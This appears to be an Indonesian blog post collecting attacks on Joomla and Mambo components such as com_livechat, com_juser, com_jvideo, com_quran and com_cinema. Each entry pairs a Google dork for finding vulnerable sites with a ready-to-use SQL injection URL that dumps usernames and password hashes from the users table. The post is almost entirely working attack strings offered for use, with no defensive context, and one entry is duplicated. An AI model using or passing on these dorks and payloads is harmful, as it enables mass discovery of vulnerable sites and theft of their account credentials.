Senin, 04 November 2013

Exploite n Bugs Joomla



    Jomla Live chat



    Dork:
    Code:

    allinurl:option=com_livechat

    Exploit :
    Code:

    administrator/components/com_livechat/getChat.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3,4%20from%20jos_users

    administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users



    Joomla "option=com_juser"


    info http://milw0rm.com/exploits/8847

    Dork:
    Code:

    inurl:option=com_juser

    exploit:
    Code:

    index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--



    Joomla "com_jvideo"



    info dari http://milw0rm.com/exploits/8821

    Dork :
    Code:

    inurl:option=com_jvideo
    inurl:com_jvideo

    exploit:
    Code:

    index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users



    Joomla "option=com_juser"


    info http://milw0rm.com/exploits/8847

    Dork:
    Code:

    inurl:option=com_juser

    exploit:
    Code:

    index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--




    Joomla com_ewriting





    Joomla com_simple_review Sql injection


    Dork:
    Code:

    inurl:"com_simple_review"

    Exploit:
    Code:

    index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users--



    Joomla Qur'an component


    DORK :
    Code:

    inurl:"/index.php?option=com_quran"

    atau

    allinurl:"com_quran"

    Exploit :

    Mambo
    Code:

    index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--

    Joomla
    Code:

    index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--



    Joomla Component com_cinema SQL Injection


    DORK
    Code:

    allinurl: "com_cinema"

    EXPLOiT 1 :

    Code:

    index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/*

    EXPLOiT 2 :
    Code:

    index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(username,0x3a,password)/**/from/**/jos_users/*



    Joomla Component joomradio Remote SQL Injection


    DORK:
    Code:

    inurl:com_joomradio

    Exploit :
    Code:

    index.php?option=com_joomradio&page=show_video&id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users--

Diposting oleh di
Label:

Tidak ada komentar:

Posting Komentar

Silahkan berkomentar.
Asalkan tidak saling mencaci dan berbau sara.
Komentar yang dianggap spam akan dihapus.
Terima kasih atas kunjungan anda.

Langganan: Posting Komentar (Atom)